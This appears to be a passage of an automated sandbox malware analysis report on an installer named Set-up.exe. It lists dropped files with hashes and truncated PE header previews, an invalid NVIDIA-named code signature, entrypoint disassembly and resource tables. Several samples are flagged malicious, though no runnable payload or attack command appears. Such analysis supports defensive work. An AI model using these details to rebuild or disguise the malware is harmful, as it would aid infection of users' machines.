                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):35616
                                                                                                                                                                                              Entropy (8bit):6.953519176025623
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                              MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                              SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                              SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                              SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-FT9F2.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):846325235
                                                                                                                                                                                              Entropy (8bit):0.13954043794048707
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                              SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                              SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                              SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Roaming\ColorStreamLib\is-3O7DV.tmp

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):846325235
                                                                                                                                                                                              Entropy (8bit):0.13954043794048707
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                              SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                              SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                              SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Entropy (8bit):0.589957120299139
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:Set-up.exe
                                                                                                                                                                                              File size:76'245'718 bytes
                                                                                                                                                                                              MD5:17f0ea252818b24ed314f8a2443a4de4
                                                                                                                                                                                              SHA1:db02cbfcea69820422a6012603c962c2648c9038
                                                                                                                                                                                              SHA256:110a88cbc097e36f9e570af2e82c22a599acc9d9e2cd1d32b531c9f712217c7d
                                                                                                                                                                                              SHA512:b5e2255afbc2b8ee5e1897cdb41aefd665d16600205d7085dcf47ac586764bbbfff5f69746d7256996910545786446e3205ce38e04ee09959975f1a3251c9454
                                                                                                                                                                                              SSDEEP:24576:VqL7dQcuoTT1lzFvE6cW6vry3jZU1qTZrCYK17K2Qq9QfpK:VqnPsc6v+9UUTg42Qq1
                                                                                                                                                                                              TLSH:76F7A21EAD02FEE2C789A0648622DDFD55B67D83B32194C701DD3A26FE239D803B255D
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... i.gd..4d..4d..4d..4e..4...4n..4...4c..4...4e..4...4b..4...4}..4d..4_..4...4N..4R..4~..4R..4u..4...4e..4Richd..4........PE..L..

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:45c939e17139c851

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x4967be
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:
                                                                                                                                                                                              Time Stamp:0x676BB10D [Wed Dec 25 07:15:25 2024 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:b214bce09c2713602d5f942f9ac78b98

                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                              • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                              • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                                                              Version:3
                                                                                                                                                                                              Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                                                              Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                                                              Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                                                              Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                              push FFFFFFFFh
                                                                                                                                                                                              push 004DE1C0h
                                                                                                                                                                                              push 0049CBCCh
                                                                                                                                                                                              mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                              push eax
                                                                                                                                                                                              mov dword ptr fs:[00000000h], esp
                                                                                                                                                                                              sub esp, 58h
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              push esi
                                                                                                                                                                                              push edi
                                                                                                                                                                                              mov dword ptr [ebp-18h], esp
                                                                                                                                                                                              call dword ptr [004CE30Ch]
                                                                                                                                                                                              xor edx, edx
                                                                                                                                                                                              mov dl, ah
                                                                                                                                                                                              mov dword ptr [0050B540h], edx
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              and ecx, 000000FFh
                                                                                                                                                                                              mov dword ptr [0050B53Ch], ecx
                                                                                                                                                                                              shl ecx, 08h
                                                                                                                                                                                              add ecx, edx
                                                                                                                                                                                              mov dword ptr [0050B538h], ecx
                                                                                                                                                                                              shr eax, 10h
                                                                                                                                                                                              mov dword ptr [0050B534h], eax
                                                                                                                                                                                              push 00000001h
                                                                                                                                                                                              call 00007F1E5084D84Eh
                                                                                                                                                                                              pop ecx
                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                              jne 00007F1E5084750Ah
                                                                                                                                                                                              push 0000001Ch
                                                                                                                                                                                              call 00007F1E508475C7h
                                                                                                                                                                                              pop ecx
                                                                                                                                                                                              call 00007F1E5084D559h
                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                              jne 00007F1E5084750Ah
                                                                                                                                                                                              push 00000010h
                                                                                                                                                                                              call 00007F1E508475B6h
                                                                                                                                                                                              pop ecx
                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                              mov dword ptr [ebp-04h], esi
                                                                                                                                                                                              call 00007F1E5084D387h
                                                                                                                                                                                              call 00007F1E5084D2E1h
                                                                                                                                                                                              mov dword ptr [0050CE94h], eax
                                                                                                                                                                                              call 00007F1E5084D16Ah
                                                                                                                                                                                              mov dword ptr [0050B520h], eax
                                                                                                                                                                                              call 00007F1E5084CF37h
                                                                                                                                                                                              call 00007F1E5084CE7Ah
                                                                                                                                                                                              call 00007F1E5084AF06h
                                                                                                                                                                                              mov dword ptr [ebp-30h], esi
                                                                                                                                                                                              lea eax, dword ptr [ebp-5Ch]
                                                                                                                                                                                              push eax
                                                                                                                                                                                              call dword ptr [004CE250h]
                                                                                                                                                                                              call 00007F1E5084CE1Eh
                                                                                                                                                                                              mov dword ptr [ebp-64h], eax
                                                                                                                                                                                              test byte ptr [ebp-30h], 00000001h
                                                                                                                                                                                              je 00007F1E50847508h
                                                                                                                                                                                              movzx eax, word ptr [ebp-2Ch]

                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                              • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                                                                                              • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                              Data Directories

                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xeafa00x104.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x10e0000xc5000.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x48b31160x39c0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xce0000x7b4.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                              Sections

                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .text0x10000xcce180xcd000891d77b99bead751eed957b3cf526461False0.5533786680640244data6.724884976439106IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rdata0xce0000x1f9a20x2000083deabb2b79de26612795649a905c4ecFalse0.3486328125data4.995286150286831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .data0xee0000x1f9c80x1b0004b8dcfd559e7ed4f1f9591313031eb50False0.31859447337962965data4.091038435139011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .rsrc0x10e0000xc50000xc50005adfd50e29efb3fdb25368f2fb11af8aFalse0.35127126625951777data5.614278710780053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                              Resources

                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              PNG0x1756280x74dPNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0058855002675227
                                                                                                                                                                                              PNG0x175d780x85dPNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0051377860812705
                                                                                                                                                                                              PNG0x176b580x521PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0083777608530085
                                                                                                                                                                                              PNG0x1770800x538PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082335329341316
                                                                                                                                                                                              PNG0x1775b80x557PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008046817849305
                                                                                                                                                                                              PNG0x177b100x550PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0080882352941176
                                                                                                                                                                                              PNG0x1780600x57cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078347578347577
                                                                                                                                                                                              PNG0x1785e00x546PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081481481481482
                                                                                                                                                                                              PNG0x178b280x58fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077301475755447
                                                                                                                                                                                              PNG0x1790b80x534PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082582582582582
                                                                                                                                                                                              PNG0x1795f00x534PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082582582582582
                                                                                                                                                                                              PNG0x1765d80x579PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078515346181298
                                                                                                                                                                                              RT_CURSOR0x14ab480x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                              RT_CURSOR0x14ac980x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.5681818181818182
                                                                                                                                                                                              RT_CURSOR0x14ade80x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.5487012987012987
                                                                                                                                                                                              RT_CURSOR0x14af380x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4383116883116883
                                                                                                                                                                                              RT_CURSOR0x14b0880x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.41883116883116883
                                                                                                                                                                                              RT_CURSOR0x179b280x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                              RT_CURSOR0x179c600xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                              RT_CURSOR0x179d400x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                              RT_CURSOR0x179e780xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.5944444444444444
                                                                                                                                                                                              RT_CURSOR0x179f580x134AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\370\037\377\377\370\037\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.32142857142857145
                                                                                                                                                                                              RT_CURSOR0x17a0900xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.49444444444444446
                                                                                                                                                                                              RT_CURSOR0x17a1700x134AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\360\037\377\377\370?\377\377\374\177\377\377\376\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.33766233766233766
                                                                                                                                                                                              RT_CURSOR0x17a2a80xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.5
                                                                                                                                                                                              RT_CURSOR0x17a3880x134AmigaOS bitmap font "(", fc_YSize 4294966787, 3840 elements, 2nd "\377\003\300\377\377\200\001\377\377\300\003\377\377\340\007\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5616883116883117
                                                                                                                                                                                              RT_CURSOR0x17a4c00xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.5444444444444444
                                                                                                                                                                                              RT_BITMAP0x11fce80x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.2413793103448276
                                                                                                                                                                                              RT_BITMAP0x12c5d80x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.015397923875432526
                                                                                                                                                                                              RT_BITMAP0x123e600x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.06548442906574395
                                                                                                                                                                                              RT_BITMAP0x12f3000x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.014186851211072665
                                                                                                                                                                                              RT_BITMAP0x11cfc00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 14173 x 14173 px/mEnglishUnited States0.029238754325259516
                                                                                                                                                                                              RT_BITMAP0x1205100x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.07681660899653979
                                                                                                                                                                                              RT_BITMAP0x1298b00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.07378892733564014
                                                                                                                                                                                              RT_BITMAP0x1145200x2428Device independent bitmap graphic, 96 x 24 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.028630077787381157
                                                                                                                                                                                              RT_BITMAP0x126b880x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.01972318339100346
                                                                                                                                                                                              RT_BITMAP0x1126f80x1e28Device independent bitmap graphic, 80 x 24 x 32, image size 7680, resolution 2835 x 2835 px/mEnglishUnited States0.03212435233160622
                                                                                                                                                                                              RT_BITMAP0x11a2980x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.10043252595155709
                                                                                                                                                                                              RT_BITMAP0x1169480xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/mEnglishUnited States0.17834190231362468
                                                                                                                                                                                              RT_BITMAP0x1175700x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.014359861591695501
                                                                                                                                                                                              RT_BITMAP0x1232380xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 101857 x 101857 px/mEnglishUnited States0.09318766066838047
                                                                                                                                                                                              RT_BITMAP0x10f9d00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 120945 x 120945 px/mEnglishUnited States0.08295847750865051
                                                                                                                                                                                              RT_BITMAP0x1320280x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.07179930795847751
                                                                                                                                                                                              RT_BITMAP0x134d500x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.10294117647058823
                                                                                                                                                                                              RT_BITMAP0x137d400x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/mEnglishUnited States0.06870538611291369
                                                                                                                                                                                              RT_BITMAP0x13efb80x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.04835640138408304
                                                                                                                                                                                              RT_BITMAP0x137a780x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/mEnglishUnited States0.0800561797752809
                                                                                                                                                                                              RT_BITMAP0x1465080x1b8Device independent bitmap graphic, 20 x 5 x 32, image size 400, resolution 151181 x 151181 px/mEnglishUnited States0.2590909090909091
                                                                                                                                                                                              RT_BITMAP0x141ce00x4828Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 30236 x 30236 px/mEnglishUnited States0.03621697704634041
                                                                                                                                                                                              RT_BITMAP0x13ad680x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 101857 x 101857 px/mEnglishUnited States0.06327060350421804
                                                                                                                                                                                              RT_BITMAP0x13dd900x1228Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/mEnglishUnited States0.21493115318416522
                                                                                                                                                                                              RT_BITMAP0x1466c00x268Device independent bitmap graphic, 6 x 24 x 32, image size 576, resolution 151181 x 151181 px/mEnglishUnited States0.14123376623376624
                                                                                                                                                                                              RT_BITMAP0x1469280x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.19061302681992337
                                                                                                                                                                                              RT_BITMAP0x1471500x108Device independent bitmap graphic, 28 x 2 x 32, image size 224, resolution 2835 x 2835 px/mEnglishUnited States0.1856060606060606
                                                                                                                                                                                              RT_BITMAP0x1472580x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.15373563218390804
                                                                                                                                                                                              RT_BITMAP0x147a800x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 2835 x 2835 px/mEnglishUnited States0.0997191011235955
                                                                                                                                                                                              RT_BITMAP0x147d480x48Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/mEnglishUnited States0.4166666666666667
                                                                                                                                                                                              RT_BITMAP0x147d900x868Device independent bitmap graphic, 66 x 8 x 32, image size 2112, resolution 2835 x 2835 px/mEnglishUnited States0.0766728624535316
                                                                                                                                                                                              RT_BITMAP0x17a5a00x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404EnglishUnited States0.34615384615384615
                                                                                                                                                                                              RT_BITMAP0x17ac700xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                              RT_BITMAP0x17ad280x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260EnglishUnited States0.28296703296703296
                                                                                                                                                                                              RT_BITMAP0x17ae980x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                              RT_ICON0x14ca000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
